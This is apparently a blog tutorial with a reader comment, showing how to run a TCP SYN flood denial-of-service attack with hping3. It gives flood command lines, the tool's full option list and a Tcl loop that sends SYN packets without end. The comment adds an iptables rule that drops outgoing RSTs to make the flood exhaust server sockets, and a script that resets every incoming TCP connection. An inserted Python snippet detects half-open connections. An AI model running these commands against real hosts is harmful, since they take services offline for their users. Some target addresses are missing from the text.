TCP SYN flood DOS attack with hping

November 24, 2012


Wikipedia defines hping as:

hping is a free packet generator and analyzer for the TCP/IP protocol distributed by Salvatore Sanfilippo (also known as Antirez). Hping is one of the de facto tools for security auditing and testing of firewalls and networks, and was used to exploit the idle scan scanning technique (also invented by the hping author), and now implemented in the Nmap Security Scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in very short time.

On Ubuntu, hping can be installed from the Synaptic package manager or from the terminal:

$ sudo apt-get install hping3

SYN flood

To send SYN packets, use the following command in a terminal:

$ sudo hping3 -i u1 -S -p 80

The above command would send TCP SYN packets to
sudo is necessary because hping3 creates raw packets for the task, and raw sockets require root privileges on Linux.

-S : sets the SYN flag
-p 80 : target port 80
-i u1 : wait 1 microsecond between packets

More options

Sending N packets:

-c : the number of packets to send/receive

$ sudo hping3 -i u1 -S -p 80 -c 10 
HPING (eth0 S set, 40 headers + 0 data bytes

--- hping statistic ---
10 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

Other options from help:

$ hping3 -help
usage: hping3 host [options]
-h --help show this help
-v --version show version
-c --count packet count
-i --interval wait (uX for X microseconds, for example -i u1000)
--fast alias for -i u10000 (10 packets for second)
--faster alias for -i u1000 (100 packets for second)
--flood sent packets as fast as possible. Don't show replies.
-n --numeric numeric output
-q --quiet quiet
-I --interface interface name (otherwise default routing interface)
-V --verbose verbose mode
-D --debug debugging info
-z --bind bind ctrl+z to ttl (default to dst port)
-Z --unbind unbind ctrl+z
--beep beep for every matching packet received
default mode TCP
-0 --rawip RAW IP mode
-1 --icmp ICMP mode
-2 --udp UDP mode
-8 --scan SCAN mode.
Example: hping --scan 1-30,70-90 -S
-9 --listen listen mode
-a --spoof spoof source address
--rand-dest random destionation address mode. see the man.
--rand-source random source address mode. see the man.
-t --ttl ttl (default 64)
-N --id id (default random)
-W --winid use win* id byte ordering
-r --rel relativize id field (to estimate host traffic)
-f --frag split packets in more frag. (may pass weak acl)
-x --morefrag set more fragments flag
-y --dontfrag set don't fragment flag
-g --fragoff set the fragment offset
-m --mtu set virtual mtu, implies --frag if packet size > mtu
-o --tos type of service (default 0x00), try --tos help
-G --rroute includes RECORD_ROUTE option and display the route buffer
--lsrr loose source routing and record route
--ssrr strict source routing and record route
-H --ipproto set the IP protocol field, only in RAW IP mode
-C --icmptype icmp type (default echo request)
-K --icmpcode icmp code (default 0)
--force-icmp send all icmp types (default send only supported types)
--icmp-gw set gateway address for ICMP redirect (default
--icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)
--icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)
--icmp-help display help for others icmp options
-s --baseport base source port (default random)
-p --destport [+][+]<port> destination port(default 0) ctrl+z inc/dec
-k --keep keep still source port
-w --win winsize (default 64)
-O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4)
-Q --seqnum shows only tcp sequence number
-b --badcksum (try to) send packets with a bad IP checksum
many systems will fix the IP checksum sending the packet
so you'll get bad UDP/TCP checksum instead.
-M --setseq set TCP sequence number
-L --setack set TCP ack
-F --fin set FIN flag
-S --syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U --urg set URG flag
-X --xmas set X unused flag (0x40)
-Y --ymas set Y unused flag (0x80)
--tcpexitcode use last tcp->th_flags as exit code
--tcp-mss enable the TCP MSS option with the given value
--tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime
-d --data data size (default is 0)
-E --file data from file
-e --sign add 'signature'
-j --dump dump packets in hex
-J --print dump printable characters
-B --safe enable 'safe' protocol
-u --end tell you when --file reached EOF and prevent rewind
-T --traceroute traceroute mode (implies --bind and --ttl 1)
--tr-stop Exit when receive the first not ICMP in traceroute mode
--tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop
--tr-no-rtt Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
--apd-send Send the packet described with APD (see docs/APD.txt)

Packet crafting with hping

As of version 3, hping is scriptable using the Tcl language and also has a shell for interactive commands.
To send SYN packets:

$ sudo hping3
hping3> while {1} { hping send "ip(saddr=,daddr=,dport=80,flags=s)" }
[2]+  Stopped                 sudo hping3

The above method allows for easier, human-readable packet crafting. Use Wireshark to detect and analyse the packets sent.
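
On the receiving host, traffic like this shows up as TCP entries stuck in the SYN_RECV state (SYN received, final ACK of the handshake never seen). The following is an added example, not code from the original post: it counts those half-open entries per listening port from a table in `/proc/net/tcp` layout. The sample table, the function names and the threshold are constructed for illustration, and the address decoding assumes IPv4 on a little-endian host.

```python
import socket
import struct
from collections import defaultdict

SYN_RECV = 0x03  # kernel TCP state: SYN received, final ACK still missing

# Constructed sample in /proc/net/tcp layout (not captured from a real host).
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0A00000A:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1201 1
   1: 0A00000A:0050 0500000A:9C41 03 00000000:00000000 01:00000064 00000001     0        0 0 1
   2: 0A00000A:0050 0500000A:9C42 03 00000000:00000000 01:00000064 00000002     0        0 0 1
   3: 0A00000A:0050 0600000A:C001 03 00000000:00000000 01:00000064 00000001     0        0 0 1
   4: 0A00000A:0016 0700000A:D431 01 00000000:00000000 02:000A9F3C 00000000     0        0 1377 1
"""

def decode(addr):
    """'0500000A:9C41' -> ('10.0.0.5', 40001)."""
    ip_hex, port_hex = addr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)

def half_open_by_port(table):
    """Map local port -> {remote IP: number of SYN_RECV entries}."""
    result = defaultdict(lambda: defaultdict(int))
    for line in table.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 4 or int(fields[3], 16) != SYN_RECV:
            continue
        _, lport = decode(fields[1])
        rip, _ = decode(fields[2])
        result[lport][rip] += 1
    return {port: dict(srcs) for port, srcs in result.items()}

def flood_suspects(table, threshold):
    """Ports whose half-open count reaches threshold, busiest sources first."""
    alerts = []
    for port, srcs in sorted(half_open_by_port(table).items()):
        total = sum(srcs.values())
        if total >= threshold:
            alerts.append((port, total, sorted(srcs, key=srcs.get, reverse=True)))
    return alerts

if __name__ == "__main__":
    # On a live Linux host, pass open("/proc/net/tcp").read() instead of SAMPLE.
    for port, total, sources in flood_suspects(SAMPLE, threshold=3):
        print(f"port {port}: {total} half-open connections from {sources}")
```

A sensible threshold depends on the host's normal load and its SYN backlog size; the value 3 only suits the constructed sample.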

You can also code your own SYN flood program in C, Python or Perl. It requires knowledge of socket programming.

Last Updated On : 24th November 2012

3 thoughts on “TCP SYN flood DOS attack with hping”

  1. Halil


    This is a SYN attack, in the same way, that every car is a race car.

    You send a SYN, and get a SYN/ACK back. However, it's a built-in mechanism that you send a RESET back for the other side to close the socket.
    So what you will accomplish is just a lot of incomplete 3-way handshakes, which WE stop after the second handshake, and the server closes the socket…

    The command used is correct indeed,
    sudo hping3 -i u1 -S -p 80

    However I would always use a -c with the -I u1 option as you don’t want your server to become unreachable and stay that way.
    And, to make it a real SYN attack, drop egressing RST packets in iptables.
    This causes the server to keep the sockets open and you can exhaust the sockets on the server side.
    a real SYN attack is done as following:

    iptables -A OUTPUT -p tcp -m tcp --tcp-flags RST RST -j DROP
    sudo hping3 -i u1 -s ++0 -S -p 80 -c 65000

    Don’t forget to remove the iptables rule afterwards, or even better, add the destination to drop RSTs, otherwise, all RSTs are dropped.

    I just love hping3,
    and the TCL capability.

    for example, reset all tcp connections coming in :
    while 1 {
    set p [lindex [hping recv eth0] 0]
    hping3 "-R" "-a" "[hping getfield ip daddr $p]" "-c" "1" "-p" "[hping getfield tcp sport $p]" "[hping getfield ip saddr $p]"
    }

    And the nice reply , where the remote is Acknowledging our RESET of the socket :)
    nice network “virus”, which doesn’t let connections to be made :)

    HPING x.x.x.x (br0 x.x.x.x): R set, 40 headers + 0 data bytes
    len=46 ip=x.x.x.x ttl=117 DF id=25736 sport=61012 flags=A seq=0 win=9469 rtt=0.0 ms

    --- x.x.x.x hping statistic ---
    1 packets transmitted, 1 packets received, 0% packet loss
    round-trip min/avg/max = 0.0/0.0/0.0 ms

    Have a nice (packet) crafting life :)
